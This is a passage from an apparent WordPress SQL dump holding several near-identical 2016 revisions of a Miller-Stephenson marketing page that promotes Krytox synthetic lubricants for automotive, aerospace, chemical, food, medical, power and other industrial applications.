miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 16:58:58', '2016-09-28 16:58:58', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2085, 2, '2016-09-28 17:01:28', '2016-09-28 17:01:28', '&nbsp;\r\n\r\n[displayProduct id="1487"]\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong>Pick your Industry</strong>\r\n\r\n<strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong>\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\n<strong>Food Processing</strong>\r\n\r\n<strong>Medical Industry Equipment Applications</strong>\r\n\r\n<strong>Metal Processing</strong>\r\n\r\n<strong>Oxygen and Reactive Gas Service</strong>\r\n\r\n<strong>Power Generation</strong>\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\n<strong>Textile</strong>\r\n\r\n<strong>Tire Mold</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption</li>\r\n 	<li>[displayProduct]Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Our categories" ]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 17:01:28', '2016-09-28 17:01:28', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2086, 2, '2016-09-28 17:01:51', '2016-09-28 17:01:51', '&nbsp;\r\n\r\n[displayProduct id="17"]\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong>Pick your Industry</strong>\r\n\r\n<strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong>\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\n<strong>Food Processing</strong>\r\n\r\n<strong>Medical Industry Equipment Applications</strong>\r\n\r\n<strong>Metal Processing</strong>\r\n\r\n<strong>Oxygen and Reactive Gas Service</strong>\r\n\r\n<strong>Power Generation</strong>\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\n<strong>Textile</strong>\r\n\r\n<strong>Tire Mold</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption</li>\r\n 	<li>[displayProduct]Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Our categories" ]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it 